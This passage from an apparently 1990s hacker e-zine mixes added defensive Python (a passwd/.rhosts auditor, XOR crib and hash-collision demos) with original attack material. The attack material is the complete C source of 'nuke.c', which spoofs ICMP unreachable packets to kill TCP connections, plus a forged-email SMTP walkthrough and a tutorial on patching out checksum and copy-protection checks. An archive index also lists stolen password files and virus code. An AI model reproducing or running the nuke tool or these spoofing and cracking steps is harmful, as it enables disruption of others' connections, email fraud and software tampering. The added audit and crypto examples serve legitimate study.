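The passwd layout, the `+ +` .rhosts entry and the cron-planted "blah" account described above can all be checked for by an admin. This added example (not from the original mag) audits passwd and .rhosts text; the finding names, the set of "no hash here" markers and the sample data are assumptions constructed for illustration.

```python
"""Added example: audit passwd and .rhosts text for the weaknesses above."""


def audit_passwd(text):
    """Return (lineno, username, finding) tuples, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        # Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell
        if len(parts) != 7 or not parts[2].isdigit():
            findings.append((lineno, parts[0], "malformed"))
            continue
        name, pw, uid = parts[0], parts[1], int(parts[2])
        if pw == "":
            # Nothing to guess: the account logs in without a password.
            findings.append((lineno, name, "empty-password"))
        elif pw not in ("x", "NP") and pw[0] not in "!*":
            # Assumption: "x"/"NP" mean the hash is shadowed and a leading
            # "!" or "*" means locked. Anything else is a hash that every
            # local user can read and run a dictionary against.
            findings.append((lineno, name, "hash-exposed"))
        if uid == 0 and name != "root":
            # A second superuser account, like the cron-planted "blah".
            findings.append((lineno, name, "extra-uid0"))
    return findings


def audit_rhosts(text):
    """Return (lineno, finding) tuples for wildcard trust entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+":                    # a bare "+" trusts every host
            findings.append((lineno, "any-host"))
        if user == "+":                    # a bare "+" trusts every remote user
            findings.append((lineno, "any-user"))
    return findings


# Constructed sample data. The "blah" line is the one the crontab above appends;
# the jones hash is a made-up 13-character placeholder.
SAMPLE_PASSWD = """\
root:x:0:0:The Superuser:/root:/bin/sh
jones:aaBBccDDeeFFg:1023:20:Eric Jones:/u/staff/jones:/bin/tcsh
guest:*:1050:23:Locked guest:/u/others/guest:/bin/false
blah::0:0:A tempory account:/:/bin/sh
broken line without fields
"""

SAMPLE_RHOSTS = """\
# constructed sample
trusted.example.org bob
+ +
+@admins alice
"""

if __name__ == "__main__":
    for lineno, name, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd line {lineno}: {name}: {finding}")
    for lineno, finding in audit_rhosts(SAMPLE_RHOSTS):
        print(f".rhosts line {lineno}: {finding}")
```

Run it from cron against the real /etc/passwd and every home directory's .rhosts, and compare the output with the previous run so a new finding stands out.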
This will nuke the IP connection between two computers:
*./nuke <TargetUsers> <ComputerThat'sConnectingTargetComputer> <Port#ToKill>
-------------->8--------------Cuthere------------------------------------------
/*
* nuke.c version 1.0 04/25/92
* by Satanic Mechanic.
* must be root to open raw sockets. this version will kill
* almost any ip connection.
* ----------------------------------------------------------------
* I strongly advise against even compiling this software. It's far
* too dangerous, and the temptation may be there to do some real
* damage with it. Read and learn, that's it, eh? -concerned
* ----------------------------------------------------------------
*
*/
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#define DEFAULT_UNREACH ICMP_UNREACH_PORT
char *icmp_unreach_type[] = {
"net",
"host",
"protocol",
"port",
"frag",
"source",
"destnet",
"desthost",
"isolated",
"authnet",
"authhost",
"netsvc",
"hostsvc"
};
#define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *))
int resolve_unreach_type(arg)
char *arg;
{
int i;
for (i=0; i <MAX_ICMP_UNREACH; i++) {
if (!strcmp(arg,icmp_unreach_type[i])) return i;
}
return -1;
}
int resolve_host (host,sa)
char *host;
struct sockaddr_in *sa;
{
struct hostent *ent ;
bzero(sa,sizeof(struct sockaddr));
sa->sin_family = AF_INET;
if (inet_addr(host) == -1) {
ent = gethostbyname(host);
if (ent != NULL) {
sa->sin_family = ent->h_addrtype;
bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length);
return(0);
}
else {
fprintf(stderr,"error: unknown host %s\n",host);
return(-1);
}
}
return(0);
}
in_cksum(addr, len) /* from ping.c */
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum),
* we add sequential 16 bit words to it, and at the end, fold
* back all the carry bits from the top 16 bits into the lower
* 16 bits.
*/
while( nleft > 1 ) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if( nleft == 1 ) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/*
* add back carry outs from top 16 bits to low 16 bits
*/
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
int icmp_unreach(host,uhost,port,type)
char *host,*uhost;
int type,port;
{
struct sockaddr_in name;
struct sockaddr dest,uspoof;
struct icmp *mp;
struct tcphdr *tp;
struct protoent *proto;
int i,s,rc;
char *buf = (char *) malloc(sizeof(struct icmp)+64);
mp = (struct icmp *) buf;
if (resolve_host(host,&dest) <0) return(-1);
if (resolve_host(uhost,&uspoof) <0) return(-1);
if ((proto = getprotobyname("icmp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\n",stderr);
return(-1);
}
if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) {
perror("opening raw socket");
return(-1);
}
/* Assign it to a port */
name.sin_family = AF_INET;
name.sin_addr.s_addr = INADDR_ANY;
name.sin_port = htons(port);
/* Bind it to the port */
rc = bind(s, (struct sockaddr *) & name, sizeof(name));
if (rc == -1) {
perror("bind");
return(-1);
}
if ((proto = getprotobyname("tcp")) == NULL) {
fputs("unable to determine protocol number of \"icmp\n",stderr);
return(-1);
}
/* the following messy stuff from Adam Glass (icmpsquish.c) */
bzero(mp,sizeof(struct icmp)+64);
mp->icmp_type = ICMP_UNREACH;
mp->icmp_code = type;
mp->icmp_ip.ip_v = IPVERSION;
mp->icmp_ip.ip_hl = 5;
mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20);
mp->icmp_ip.ip_p = IPPROTO_TCP;
mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr;
mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr;
mp->icmp_ip.ip_ttl = 179;
mp->icmp_cksum = 0;
tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip));
tp->th_sport = 23;
tp->th_dport = htons(port);
tp->th_seq = htonl(0x275624F2);
mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));
if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) {
perror("sending icmp packet");
return(-1);
}
return(0);
}
void main(argc,argv)
int argc;
char **argv;
{
int i, type;
if ((argc <4) || (argc >5)) {
fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n");
exit(1);
}
if (argc == 4) type = DEFAULT_UNREACH;
else type = resolve_unreach_type(argv[4]);
if ((type <0) ||(type >MAX_ICMP_UNREACH)) {
fputs("invalid unreachable type",stderr);
exit(1);
}
if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);
exit(0);
}
---------------->8-------------------------------------------------------------
Well, this is the smallest stuff I have, and I'm not gonna BORE you with
kbytes and kbytes of source.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Busted for nothing ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, I am being forced to type this by gun-point.. okay, maybe not to that
extreme, but it's pretty damn close! We accept no responsibility for the
writing of this article... Can I say that? No, I guess not.. oh well, I
tried... =)
For months we were receiving hundreds of dollars worth of bills through
Telecom for calls we didn't make. For example, a $300 phone call when I
was on holiday - there wasn't anyone home, so how could someone have had a
conversation if there wasn't anyone home to accept the phone call?
[NOTE: There isn't a pill box located anywhere NEAR my house, so don't go
screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this
cute little pill box with wires sticking out of it which was right outside
of our house. Ohmigod, I think I must be going crazy... ANYway..]
These were directed through NZ-Direct from the US. Strange that. No one
had been over to the states recently and it hadn't stated that it was by
using a calling card, so that option was out. So, that required a monthly
scream at Telco about that, and eventually we stopped getting billed for
such calls (which I doubt even existed anyway).
Okay, now that's just the TIP of the iceberg. How would you like to be
"convicted" for a "crime" you didn't commit? Well, that's basically what
happened. And it was such a PETTY crime at that. Try VMB hacking!
It all started when we discovered a little VMB and everyone else happened to
find it too. What a coincidence.. *grin* Many of their boxes had the
default passwords still attached to them *sigh*. It's pathetic the way some
companies leave their systems so open and then blame someone else for "abusing
their system" when all we did was look around. Someone had edited the voice
prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up
taking the blame... hmm.. Anyway, a few of us ended up being "interrogated"
over this stupid prompt editing and leaving "abusive messages".
Anyway, the outcome was, I ended up being the only person accepting respon-
sibility for the entire incident. That included me having to write two let-
ters. Two copies of one letter - one copy to the guy who owned the VMB and
the other copy to the head of Telco security "for scrutiny" - and another
letter to the head of Wellington Telco security explaining the entire incident.
In the end, it was a waste of time not only for me - having to write two
letters - that didn't count the FIRST letter explaining why I shouldn't have
my phone line disconnected (they sent a letter to me saying that if I didn't
respond within a month, or summink, they'd disconnect it anyway - bunch o'
pricks, huh?).
In my final letter to the head of Wellington Telco Security, I reminded them
of the hundreds of dollars worth of calls I had to complain about each month.
FINALLY, something was actually done about it, and the hundred dollars worth
of calls were credited to my account.
The stupid thing was that I didn't do a thing, and had to put up with all the
crap that they threw at me. I also had my 3-way call cancelled.
In conclusion (they always said you have to include one in essays so I'd bet-
ter get extra practice =) ), I'd just like to say that they're a bunch of
dorks. Oh, and the new telephone account layout really sucks too.
[CyntaxEra Mature Mode: ON] *grin* In my opinion, it was better the way it
was, but that doesn't matter, does it? It's probably cheaper for them to do
it the new way. That would explain it all... =)
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Books 2 Read ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Title Author Stars
=================================================================
The Fools Run ...................... John Camp *****
Complicity ...................... Iain Banks ****
War Day ...................... Strieber & Kunetka *****
Blood Music ...................... Greg Bear ****?
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The SLi Archive Subject list ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, this is the list of all <well, most of> the file areas in the SLi
archives. It's a direct copy of the "/pub/README.NOW!" file and is up to
date as of the release date.
-sof-
Welcome to the SLi archives!
We hope your stay is, err, umm, "enlightening".
The operator of this system takes no responsibility for how the information
is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files
describe! Some acts depicted in the files held within this archive describe
illegal or immoral acts. PLEASE use your commonsense when defining right
from wrong.
This archive exists to be a library of information, to show people a dif-
ferent outlook on the world and, in truth, a different outlook on life to
give them the opportunity to delve into the realms of adventure and
knowledge - NOT to incite or teach people how to break the law.
Directories Sub Directories Description
-----------+-------------------+-------------------------------------------
./ai Artificial Intelligence.
./anarchy Anarchy files, explosives etc. (Likely
not to be here anymore as I'm against
this kinda shit now)
./art Art.
ansi If I find ppl up'ing ANSI, I'll shoot
them.
ascii Better than ANSI, I guess.
vt-xxx VT Animations at present.
./bbs
bbs-adds BBS adverts - numbers etc..
. au
. nz
. other
. uk
usa
. misc
./busts Info on different busts.
./cc Info on credit/calling cards, ATMs
etc.
./civil Civil liberties
./cons Conferences for H/P people - where when,
what happened and confs to come.
./corewars Files for Core Wars.
./cryptography Encrypting and Decrypting.
./cyber The world of the Cyberpunk.
./eff Information on the Electronic Freedom
Foundation - a US civil rights group.
./faq General Frequently Asked Questions.
./history A MUST to read! You HAVE to read these
files. They are linked to other
directories all over the SLi archive, but they
contain a history of different events in
the H/P world.
./howto How-to Guides to misc computer related
activities.
./incoming Incoming files.
./info These files are also contained in other
places in this archive, but are here
because they should be read and because,
in my opinion, they are important.
./internet Internet related files.
irc Internet Relay Chat [IRC] files.
sites Different FTP/TELNET sites.
./misc Just a lot of misc stuff with no real
home.
bible Obviously, the Bible.
./mischp Misc Hack/Phreak files.
cable Files to do with Cable TV/SKY.
lockpick Lock-picking related files.
./music Music related stuff.
lyrics Lyrics for songs etc.
misc Misc music related files.
mods Electronic music - most powerpacked for
Amiga.
vocs PC Sound files.
./nz New Zealand related files!
./passwds Password files for different systems.
Please rename the password file to be
"systemname-dd-mm-yy".
ie.
lamesystem-01-02-95.
./pharm Drug files (also probably going to be
removed for the same reason as
"anarchy")
./phreak Information on the Telephone System.
box Different phreaking "boxes".
cellfone Cellular Fones.
countrycodes Every Area/Country Code in the world.
fone-fraud Misc files on fone-fraud written by
Telco/Schools.
history History of the Telefone
. misc Misc Files.
miscexe Misc Executables.
payfones Payphone related files.
. pbx Private Branch eXchanges [PBXs].
standards Different CCITT/Phone Standards.
. vmb Voice Mail Boxes [VMBs].
./pirate Breaking the (c) protection of S/W.
amiga
crack
coding
. ibm
mac
./police Understand thy opposition
misc Miscellaneous files on the police.
./publications Different files from well-known authors
or organisations.
bruce_sterling Includes The Hacker Crackdown and inside
directories FSF_columns, catscan and
interzone.
david_faber
denning
john_gilmore Includes inside directories
Gilmore_v_NSA and inside that,
Clipper_FOIA and ITAR_FOIA.
john_perry_barlow
kapor
unsorted Miscellaneous unsorted publications.
./security Computer Security, Bug fixes and security
hole descriptions.
8lgm Unix bugs
cert Computer Emergency Response Co-ordination
Centre.
cert_advisories A LOT of system security holes
clippings Misc clippings from different usenet
sources.
misc Misc info.
. dos. DOS <PC> security files.
novell Novell netware.
tools Misc tools for DOS.
faq Frequently Asked Questions.
mac Misc files for the Macintosh.
misc Misc files on Computer Security.
os2 Files for OS2.
unix Files for UNIX based OS's.
antihacktools Anti-Hacker Tools
hackerssrc Various source for you hackers.
hp Files for hacking the Hewlett-Packard's
HPX000's.
vax Vax/Digital/VMS Security.
x.25. x.25 security holes
./sli Southern Lights inc. File Areas.
articles
interest Files that are related to SLi and are
of interest to the rest of the H/P world
mags The SLi Mags are stored here.
. warnings READ any files in here!
./strange Weird files that should have no place
to go :)
. occult Stuff on the occult <black magic etc..>
. ufo UFO files.
./system Files for different OS's.
. amiga
asm
. utils
. dos
linux
./txts Like misc really.
./usenet Files/Msgs from usenet.
./virus Virus Creators and virus code. Any anti-
virus people feel free to use this info
to create virus killers.
./words Word files.
./zines Electronic Mags.
. hpa Hacking, Phreaking and Anarchy Mags.
. other Don't fit anywhere.
. weird Very weird.
TOTAL DISK SPACE USED: 79055Kbytes [compressed]
Approximately 200Meg [uncompressed].
As of recent times, we have been updating the system at 1-2 Meg per day.
However, this cannot continue, as we have but 40Meg available disk space
remaining, but if anyone is willing to donate an IDE drive, we will be most
appreciative.
NOTE: The use of the word "removed" is being used as in "access to these
files will be removed from normal access users".
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Fake Mail ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, I don't know WHY this is in here, but just in case you're interested
and DIDN'T know how to send fake Internet E-Mail, here is a step-by-step
way to do it.
KEY: ignore []'s
*'s are lines that you type
type "telnet [target.comp] 25" at $prompt.
Trying [target.comp]...
Connected [target.comp].
Escape character is '^]'.
220-[target comp] [Mailer/Version] ready at [date/time]
220 ESMTP spoken here
*helo [where.from.comp]
250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you
*mail from: [where@ever.you.like]
250 [where@ever.you.like]... Sender ok
*rcpt to: [target@target.comp]
250 [target@Target.comp]... Recipient ok
*data
354 Enter mail, end with "." on a line by itself
*hello
*.
250 DAA28466 Message accepted for delivery
*quit
221 [Target.Comp] closing connection
Connection closed by foreign host.
$
Well there you have it. Nice and easy. If you didn't know it already, I'm
a bit disappointed, but that's what we are here for. To teach YOU.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Elements of Data Deprotection ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Elements of Data Deprotection - by Thorium
Data Deprotection is one of my many hobbies. Others include bomb making,
programming, hacking, shooting, phreaking and appearing in court.
I am by no means an expert in this field, in fact I would regard myself as
a "seasoned amateur". However, I feel that some tips I have picked up
over the years could help others. For this reason I am writing this file.
HOLD IT! You can't program? Well, this won't be much good to ya. You
might even need to know some assembler on whatever platform you use. I use
Amigas usually (because they are simply the best personal computer - well
for assembler programmers anyway) so I know a fair bit of 68000 assembler.
It also helps to know a few common opcodes (what the actual text of
assembler language gets turned into, ie machine language) and how to use a
good debugger and disassembler.
So, if you are up to here, you're half way to being a K-RAD ELITE DUDE
anyway. In fact, you can probably do more interesting things than most who
call themselves "K-RAD ELITE DUDE"s - so why are you reading this? That's
right, you thought you might pick up a hint or two in an underground
publication. Ok, I hope you learn something.
First:
What do I mean "Data Deprotection" ???
This is probably not the best name for what I will actually describe, but
it is all I could think of. I mean "getting into data" - but not in the
sense of cryptanalysis and that sort of thing that requires a degree.
Data Deprotection has particular reference to breaking encryption
algorithms, to getting around or breaking checksums and CRCs, and making
small but crucial changes to programs.
NOTE: Some people would call some uses of these skills "Cracking", and
assume that you go around breaking the protection on games. This is
distinctly possible, but before I go further, I would like to point out my
personal feelings on breaking program protection:
If you "crack" a game and distribute it, you are killing the software
industry. Anyway, you needed an original to crack - which someone had to
buy - so whoever bought it is stupid if they pay for something then let
everyone else have it. Basically, I do crack games and things, but I don't
spread what I do. The main reason for this is that I'm not good enough to
keep up with the "big boys" in Europe who crack the latest game overnight.
If I get hold of an original game, it is usually fairly old anyway, like a
year or two, and even back then they had some pretty tricky protection that
has taken a while to get around (like a few days work). Of course, there
are those dead simple games (try Eye of the Beholder II for a beginners
one). Thing is, everyone has it by the time I have finished with it. So I
don't crack to spread. I hardly crack games at all, since my access to
originals is limited. I crack only for the fun of it. And it is quite
fun to pitch your mind against those of the programmers - kind of like
chess play-by-purchase. Anyway, that's my ideas on cracking games etc. If
you want to, go ahead. It just kills the industry. This is why this
article will deal as little as possible with things that could be used to
crack games. It will deal more with accessing data from programs that you
aren't really 'sposed to access.
So, you have this program. You have made whatever change to it for
whatever reason, and it now comes up "corrupt data" or something along those
lines. Now, all you did was change a "Compare with password" to a "Don't
do anything" - so you know it should be able to work fine.
To see if a checksum is your problem, try running the program in its
original form from your debugger. Just straight running it. If it still
comes up "error" then your debugger just ain't good enough, since it is not
totally transparent to the program. It would require a discussion on each
debugger to fix this, and I only know those that I use.
If it ran OK, try placing a breakpoint at the place where you change things
and then running the program. Don't do anything at the breakpoint, just
run the program. If it fails, chances are you have a checksum. If not,
try putting the breakpoints around your place you changed, and after they
break, put them back. If it fails, it's probably some sort of check. If
not, something weird is happening. The reason behind this is that almost
all debuggers will use breakpoints that actually change the memory that you
place a breakpoint on. So when a program goes to check its memory, if
there is a breakpoint there, it won't find what it thought it would.
So, your program has a checksum? If not, you will need to do a little more
hacking to find out what's up. It usually ain't too hard, but beyond the
scope of this text. Well, the next thing to do is FIND the checksum.
This can be done by placing a breakpoint on the place you changed. If you
run it without putting the breakpoint back after it occurs and your
program runs fine, then your check is AFTER the part you altered. If it
fails, then the checksum is BEFORE the part you altered. Pretty simple
really. You can further narrow this down by putting breakpoints at
strategic points throughout the code, and watching what happens when you
have a breakpoint in existence only up to there. You will eventually find
the area of code that does the check.
Once you have found this piece of code, you can figure out what it does.
Chances are your program is in some form of compiled language, so won't be
as easy to read as 100% assembler code, but by tracing through it, you can
usually figure out what's up. The skill is to look for critical points in
the code. THERE WILL (almost) ALWAYS BE A COMPARE after any sort of
checksum, whether it be a simple addition, or a complicated CRC. This
compare will then have a conditional statement - this is the crux of it.
All you do is remove the conditional and cover it with a constant - if it
is supposed to branch if a certain value, make it branch always. If it
branches only if NOT a certain value, make it a do-nothing set of
instructions. Sometimes there will be more than one check of the value, so
you must find all of them.
I feel I may have just skipped a vital idea. We changed the conditional
rather than the compare value because we want all future attempts at this
routine to be correct. This may be easier illustrated in, for example, a
trainer mode for a game. It is better to make UNLIMITED lives by removing
the conditional, than to have 9999999 lives - because you can still die.
Also it is a lot easier to change back to its original form if you stuff
up, because you only need write down the opcodes, not the constant.
Now you have just gotten around a check in the program. There may be more,
and they may be hidden. So just test your program for full functionality.
Insert your original alteration, and test again. If you still have
problems, try this again. There could be multiple checks, checks on
checks, and all sorts of stuff.
You will notice now that the "difference" between your original program
and the altered one will only be a few key bytes. However it is how these
key bytes are placed that is important.
This is only one skill of many you will pick up as a hacker / cracker, but
one of the most used.
And now to make this entire section useless, I shall tell you how to get
around this type of hacking / cracking when you are on the programming end.
MAKE YOUR CHECK VARIABLES DO SOMETHING. If you calculate the CRC or some
vital code, don't just compare it, use it as a relative pointer into a data
segment. If the CRC is wrong, your system crashes. It's best to not even
COMPARE it, as this means you have the correct value sitting there. Just
assume it is right, and have the checksum or CRC or whatever in your
initialization code, but don't use it till much later on. This way your
hacker will likely give up.
And to make that useless - how to crack programs that use this technique
(gee, get the feeling every crack leads to a fix, and every fix leads to a
crack?). Just debug the program, figure out the correct value for the CRC
or whatever, and hard-code that in! Wipe over the CRC routine with one
that sets any variables it was supposed to correctly. Chances are it will
take up less space anyway!
So, we have done "actually changing a program" from the point of view of
making it run with changes. Now I shall cover (very basically) encryption
and decryption.
Encryption is mostly used to keep things from prying eyes. Which is
exactly what makes me want to break it. A program might have its
datafiles stored encrypted to stop you getting unfair hints, or it might
have some of its code encrypted that does some magical copy protection.
Essential to the breaking of codes with reference to programs, is that any
program has all the code necessary to decrypt its data. PGP has all its
code there in source form, what could be easier. However, this is where
the first problem starts - the KEY. If you know the key, you really don't
need to be reading this. If you don't know the key, you have to break the
algorithm. This is where it gets hard. PGP is more or less unbreakable,
because it uses a complicated algorithm and a complex and constantly
changing key (different for each person).
However most programs use only 1 key, and that is usually stored within
the program itself. The simplest of routines is that you get all your
data, and logically NOT it, ie all 1's become 0's and all 0's become 1's.
For this simple system, the algorithm IS the key. All you do is reverse
the algorithm, ie run it over again, and out comes your data.
Another logical operator, Exclusive-OR (sometimes referred to as EOR or
XOR), is commonly used. This is easiest thought of as a "selective not" -
where each bit in the "key" (source) says whether each bit in the
destination should be "NOT"'d. If the key bit is a 1, it is. So a key of
1010 and a dest of 1001 would become 0011. This is also a reversible
algorithm, so all you do is run it over again. EOR has the advantage of
being an algorithm with a "key" component. The KEY can be difficult to guess,
especially if it is more than 1 byte. However there are ways to get around
it. First, see if the program uses a fixed key - ie debug / disassemble it
and see. If so, there you have it. A little playing around and you have
your data.
This brings me to the next main point of this article - finding the EOR key
if you don't have one. This is actually really easy - all you need to do
is know some of the data that is after the EOR, and the length of the Key.
The length of the key can usually be determined from the algorithm, if it
is a continuous loop of EOR'ing a byte with some data, the key is a byte.
If it is going through a reference table (and you can't just dig this table
up) then you have to figure out how long it is. You also need to know at
least one keylength of decrypted data.
What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR
1001 = 1010 - in other words, the key acting on the cypher yields the data,
and the data acting on the cypher yields the key! So all you do is write a
small program that gets your data, and eor's it with the cypher, and you
have the key. You can also build a key from some fragments of data by
guessing what the data in between might be - if this is text, it is usually
easy. Now you apply your key to the rest of the data. Simple!
However one problem is that you usually don't know where abouts in the
cypher your data comes from - so the solution is to write a program that
uses the data in every possible position in the cypher to yield every
possible key, and then use that key on every piece of cypher, and see what
comes out. This may take a while, and you need to be able to recognize the
data in its correct form, easy if it's text, otherwise difficult.
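The crib search described above, as an added example in Python (not code from the original article): it slides a known fragment across a repeating-key EOR cipher, derives the key each position would imply, and rejects positions where the fragment contradicts itself or the output is not readable text. The key, message and crib are constructed for the demonstration, and the key length is assumed known, as the article requires.

```python
from itertools import cycle

# Constructed data: a 3-byte key and a data file the program would keep EOR'd.
KEY = bytes([0x5A, 0xC3, 0x17])
MESSAGE = b"HINT1=look under the mat;HINT2=the red door is fake;"
CRIB = b"HINT2="          # plaintext fragment the analyst already knows


def eor(data, key):
    """Repeating-key EOR; running it twice with the same key undoes it."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def key_from_crib(cipher, crib, offset, keylen):
    """Key implied by assuming `crib` sits at `offset` in the plaintext,
    or None if that assumption contradicts itself."""
    if len(crib) < keylen:
        raise ValueError("need at least one key length of known plaintext")
    key = [None] * keylen
    for i, known in enumerate(crib):
        slot = (offset + i) % keylen        # key byte used at this position
        implied = cipher[offset + i] ^ known
        if key[slot] is None:
            key[slot] = implied
        elif key[slot] != implied:          # crib wraps round and disagrees
            return None
    return bytes(key)


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII or common whitespace."""
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def recover(cipher, crib, keylen, min_printable=0.95):
    """Try the crib at every offset; return (offset, key, plaintext) hits."""
    hits = []
    for offset in range(len(cipher) - len(crib) + 1):
        key = key_from_crib(cipher, crib, offset, keylen)
        if key is None:
            continue
        plain = eor(cipher, key)
        if printable_ratio(plain) >= min_printable:
            hits.append((offset, key, plain))
    return hits


CIPHER = eor(MESSAGE, KEY)

if __name__ == "__main__":
    for offset, key, plain in recover(CIPHER, CRIB, len(KEY)):
        print(offset, key.hex(), plain.decode())
```

A crib longer than the key does most of the filtering here: offset 0 ("HINT1=") matches the first four bytes and is still rejected by the wrap-around check. For anyone protecting data, the point is that a fixed repeating key falls to one key length of guessable plaintext.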
Other common forms of encryption are addition / subtraction of constant or
changing values, rotation of bits (either in byte, word, or larger blocks),
and swapping blocks of data (be they bits, bytes or larger blocks). The
important thing to remember is that the program itself has to be able to
decrypt the data, so with enough care and patience you can find that bit
and copy it. Remember also that there can be more than one level of
encryption, and different sets of algorithms for different blocks of data.
The final thing I wish to deal with is the topic of "One Way Encryption" -
it is used sometimes to create keys for the above checks and decryption.
It is also useful if you can break the algorithm to make an automatic
password generator for encrypted files from a given program...
This situation is actually very common. It is a real pain. However, you
spot an algorithm that creates the key, possibly from a password! Now,
somehow a password of any length is "shrunk" or "expanded" to fit a given
key length, and this is used to decrypt the data. This is called "One Way"
encryption, and is commonly used on passwords. The key created has little
bearing to the original password, and can't be recovered because there is
usually a "loss of significance" of data.
The simplest way to explain is to use the simplest one-way algorithm. Just
add all the bytes of a string together, in a byte. This way you are bound
to get overflow, rendering some data lost. However you end up with a byte
to use, and it will be a byte regardless of the length of the password.
So, if you can't get the password back, how do you pass the test? Simple -
you create a "garbageword". This is something that is functionally the
same as the password, but not actually the password. It is gained by
reversing the algorithm given the result.
In this simple algorithm all you do is get your byte key, and subtract as
many "A"'s as possible from it. Say your key was hex $BC (which
incidentally is the byte sum of the letters 'keys'). You can subtract 'A'
(hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be
liked by our algorithm if it only takes text, so we find how much we have
to TAKE OFF it to get a letter or number. The closest number is '9' just
below it, so we use that, and add the extra 1 to one of the 'A's.
Therefore our garbageword is now 'AB9' - this is functionally the same as
'keys' for this algorithm, and so we have broken the lock.
You will hardly ever get an algorithm as simple as this one, but _ANY_ one
way encryption can be made to yield a garbageword given the key if you
devote enough time to it.
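The byte-sum reduction and the garbageword construction worked through above, as an added Python example (not from the original article): it confirms that 'keys' and 'AB9' collide, finds a shortest alphanumeric collision for any target byte, and contrasts that with a salted PBKDF2 digest. PBKDF2 is this example's choice of replacement, not something the article proposes; the salt and function names are constructed.

```python
import hashlib
import string

ALNUM = (string.digits + string.ascii_letters).encode()


def byte_sum(password):
    """The article's simplest one-way reduction: add all bytes into a byte."""
    return sum(password) & 0xFF


def garbageword(target, alphabet=ALNUM, max_len=4):
    """Shortest string over `alphabet` whose byte sum equals `target`.

    Breadth-first over sums modulo 256: each round appends one more
    character to every sum reached so far, so at most 256 states are
    kept per round regardless of word length.
    """
    frontier = {0: b""}
    for _ in range(max_len):
        reached = {}
        for total, word in frontier.items():
            for ch in alphabet:
                new_total = (total + ch) & 0xFF
                if new_total not in reached:
                    reached[new_total] = word + bytes([ch])
        if target in reached:
            return reached[target]
        frontier = reached
    raise ValueError("no word of length <= %d sums to %#x" % (max_len, target))


# Constructed fixed salt so the demonstration is repeatable; a real system
# would store a random per-password salt (e.g. from os.urandom).
SALT = b"constructed-demo-salt"


def slow_digest(password, salt, iterations=100_000):
    """Salted, iterated hash: no arithmetic shortcut back to an input."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations)


if __name__ == "__main__":
    print(hex(byte_sum(b"keys")), hex(byte_sum(b"AB9")))
    print(garbageword(0xBC))
    print(slow_digest(b"keys", SALT) == slow_digest(b"AB9", SALT))
```

With only 256 possible results, every target byte has an alphanumeric garbageword of at most three characters, which is why the byte sum cannot serve as a password check.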
And how do you stop this sort of breaking of your algorithms? Easy - make
it so complex that a hacker will never want to break it. - remember your
algorithm will always yield the same key with the same input, so you don't
have to understand what you have written, you just need to check that it
makes different keys.
For example, try to break one that rotates a 2-byte key storage by the
lowest 4 bits of a letter to the right, then adds the letter, then rotates
left by the upper 4 bits, and EOR's the letter. This is not actually
_THAT_ hard to create a reverse algorithm for, it is just very hard to
create a printable garbageword. And as long as you make your entry of the
